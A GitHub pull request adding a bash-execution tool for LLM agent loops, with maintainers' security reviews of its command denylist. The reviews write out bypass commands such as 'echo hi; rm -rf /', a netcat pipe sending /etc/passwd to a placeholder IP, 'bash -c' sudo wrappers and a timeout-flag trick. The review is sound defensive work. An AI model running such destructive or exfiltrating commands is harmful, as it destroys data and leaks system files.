Skip to content

feat: add bash tool #1056

Open
akihikokuroda wants to merge 7 commits into
generative-computing:mainfrom
akihikokuroda:shell
Open

feat: add bash tool #1056
akihikokuroda wants to merge 7 commits into
generative-computing:mainfrom
akihikokuroda:shell

Conversation

@akihikokuroda
Copy link
Copy Markdown
Member

@akihikokuroda akihikokuroda commented May 11, 2026

Tool PR

Use this template when adding or modifying components in mellea/stdlib/tools/.

Description

This PR adds bash tool. It has a fixed set configuration. The UX configuration will be in a separate PR.

Implementation Checklist

Protocol Compliance

  • Ensure compatibility with existing backends and providers
    • For most tools being added as functions, this means that calling convert_function_to_tool works

Integration

  • Tool exported in mellea/stdlib/tools/__init__.py or, if you are adding a library of components, from your sub-module

Testing

  • Tests added to tests/stdlib/tools/
  • New code has 100% coverage
  • Ensure existing tests and github automation passes (a maintainer will kick off the github automation when the rest of the PR is populated)

Attribution

  • AI coding assistants used: claudecode

@akihikokuroda akihikokuroda requested a review from a team as a code owner May 11, 2026 00:21
@github-actions github-actions Bot added the enhancement New feature or request label May 11, 2026
@github-actions
Copy link
Copy Markdown
Contributor

The PR description has been updated. Please fill out the template for your PR to be reviewed.

Copy link
Copy Markdown
Contributor

@planetf1 planetf1 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the PR — the three-tier environment design (Static/Unsafe/LLMSandbox) follows code_interpreter cleanly, and reusing ExecutionResult is the right call.

Two security concerns need resolving before merge, plus a few smaller issues below.


UnsafeBashEnvironment validates argv but executes with shell=True

The safety checks parse the command with shlex.split() and inspect argv[0], then execute the original string with subprocess.run(command, shell=True, ...) (line 430). The shell processes the raw string, not the tokenised argv, so shell metacharacters bypass every check:

local_bash_executor("echo hi; rm -rf /")
# shlex.split → ['echo', 'hi;', 'sudo', 'rm', '-rf', '/']
# argv[0] = 'echo' — passes all checks
# shell runs: echo hi; rm -rf /   ← both commands execute

Same with redirects, pipes, and subshell substitution:

local_bash_executor("echo foo > /etc/passwd")             # redirect, not a write_command
local_bash_executor("echo $(id)")                         # subshell, not in argv
local_bash_executor("cat /etc/passwd | nc x.x.x.x 4444") # exfil

The fix is to execute argv with shell=False. That way what you check is exactly what runs.


bash -c "..." isn't blocked

bash, sh, zsh etc. are in DANGEROUS_COMMANDS but only blocked when -i/--interactive/-l/-login appears. bash -c "sudo rm -rf /" passes:

shlex.split('bash -c "sudo rm -rf /"') → ['bash', '-c', 'sudo rm -rf /']
any(arg in ('-i', '--interactive', '-l', '-login') for arg in argv)  # → False

Any LLM-generated command can dodge the whole denylist with a bash -c "..." wrapper. test_safe_shell_commands_allowed intentionally locks this in as expected behaviour, so it would need updating too.

If you go the shell=False route above, you'd also want to block -c (and script-file arguments) on shell interpreters.


Other things worth fixing in the same pass:

BashEnvironment.__init__ accepts allowed_paths and stores it on self, but nothing in any of the three environment classes reads self.allowed_paths. Callers who pass it expecting path enforcement get nothing. Either wire it into the checks or drop the parameter.

LLMSandboxBashEnvironment validates working_dir statically but doesn't pass it to SandboxSession (line 552 — no working_dir arg). The Docker container runs with its own default cwd. bash_executor(cmd, working_dir="/project") silently ignores the restriction.

except subprocess.TimeoutExpired at line 569 is inside the llm-sandbox session block. llm-sandbox isn't subprocess, so this handler likely never fires — timeouts fall through to except Exception with a generic message. The interpreter.py pattern just uses except Exception as e and that's cleaner here.

The parse/validate preamble (shlex.split → empty check → three validator calls) is copy-pasted into all three execute() methods verbatim. Once the security issues are fixed, extracting it to BashEnvironment._validate() would make future changes a one-place edit.

docs/examples/tools/shell_example.py line 1: # pytest: unit, qualitative → should be # pytest: e2e, qualitative. unit is auto-applied by conftest and shouldn't be written explicitly; this example runs real subprocesses so e2e is the right tier.

Three unused imports in shell.py: tempfile, dataclass, Any — ruff will flag these as F401.

Comment thread mellea/stdlib/tools/shell.py
@planetf1
Copy link
Copy Markdown
Contributor

planetf1 commented May 11, 2026

The Docker sandbox path (LLMSandboxBashEnvironment) is the right approach for production use — container isolation is a real boundary. The concern is with UnsafeBashEnvironment and the safety checks around it.

The checks (lines 91–124) parse the command with shlex.split() to inspect argv[0] and flags, but execution at line 430 passes the raw string to /bin/sh -c via shell=True. The shell re-parses everything, including metacharacters that shlex.split never touches. All four of these pass every check:

```
echo hi && sudo cat /etc/shadow # argv[0] = "echo"
true; rm -rf /home # argv[0] = "true"
bash -c 'sudo id' # bash is in DANGEROUS_COMMANDS, but only -i/-l is blocked; -c is not
python3 -c "import os; os.system('rm -rf /')" # python3 is not in the denylist
```

The Python docs cover this in the subprocess security considerations: pre-processing a string before passing it to a shell does not make it safe. The shell is the parser that matters.

Two ways to fix this. Drop shell=True and pass shlex.split(command) as the args list — the denylist then governs what actually runs, at the cost of pipes, globs, and redirects. Or remove the denylist from UnsafeBashEnvironment, rename the public function (something like unsafe_local_bash_executor), and document that it is for trusted, developer-controlled use only. The Docker sandbox already handles the untrusted case.

what direction would you plan to take? it feels like an unsafe bash execution is rather unsafe (though many tools do offer something). I wonder if it should not be allowed by default, and we need to be very clear on any limitations/security impact.

@planetf1
Copy link
Copy Markdown
Contributor

Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?

Copy link
Copy Markdown
Contributor

@ajbozarth ajbozarth left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Some feedback from Claude. Also note Nigel's follow-up comment on UnsafeBashEnvironment still stands.

Comment thread docs/examples/tools/shell_example.py Outdated
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/shell.py
Comment thread mellea/stdlib/tools/shell.py Outdated
Comment thread mellea/stdlib/tools/__init__.py Outdated
Comment thread mellea/stdlib/tools/shell.py
Comment thread test/stdlib/tools/test_shell.py Outdated
Comment thread test/stdlib/tools/test_shell.py
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
@akihikokuroda
Copy link
Copy Markdown
Member Author

Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?Checking this against #1024 — the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?

I'll address it as a follow-up.

Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
Copy link
Copy Markdown
Contributor

@ajbozarth ajbozarth left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

All major concerns from the prior round are addressed. A few non-blocking follow-ups inline.

# Only check arguments that are not paths (don't contain / or are not flag values)
for i, arg in enumerate(argv[1:], start=1):
# Skip if this looks like a flag value (argument to a preceding flag)
if i > 1 and argv[i - 1].startswith("-"):
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This assumes every -flag consumes one positional. timeout --kill-after=1 sudo whoami tokenizes to [timeout, --kill-after=1, sudo, whoami]; at i=2 (sudo), argv[1] starts with -, so sudo is skipped and the command passes the nested-command check.

Either tighten to a known set of value-taking flags, or add a test pinning the current behavior so it doesn't regress silently.

)

sandbox_workdir = self.working_dir or "/sandbox"
shell_command = " ".join(shlex.quote(arg) for arg in argv)
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Safe inside the container, but the shell re-parse is unnecessary — the outer _validate_command already produced argv. Passing argv as a list with shell=False would mirror the local path and drop the quoting round-trip. Optional cleanup.

system paths, interactive shells). Write operations may also be constrained by
``working_dir`` and ``allowed_paths``. The top-level ``bash_executor`` (recommended
for production) and ``unsafe_local_bash_executor`` (development-only) functions are
ready to be wrapped as ``MelleaTool`` instances for ReACT or other agentic loops.
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

bash script.sh, python script.py, etc. still execute arbitrary code from the file — the denylist only covers inline -c/-e. Writes through the tool are blocked, so landing a script requires an out-of-band write; acceptable trade-off, but worth one sentence here: "the denylist does not guarantee safe execution of pre-existing script files; use bash_executor for untrusted inputs."

assert result.skip_message is not None
assert (
"not allowed" in result.skip_message.lower()
or "outside" in result.skip_message.lower()
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The or branch means this test passes regardless of which validator fired. Pin to the specific reason (working-dir vs dangerous-path) so a regression in one doesn't get masked by the other.

Comment on lines +206 to +208
# Uncomment to run with LLM:
# m = start_session()
# example_3_llm_with_forced_tool_use(m)
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

why comment this out, this feels like it should be uncommented by default, especially since it uses the default session values.

Separately, when I did uncomment and run this it consistent;y generated good commands, but the follow up step to run them always "failed" with not error.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

enhancement New feature or request

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants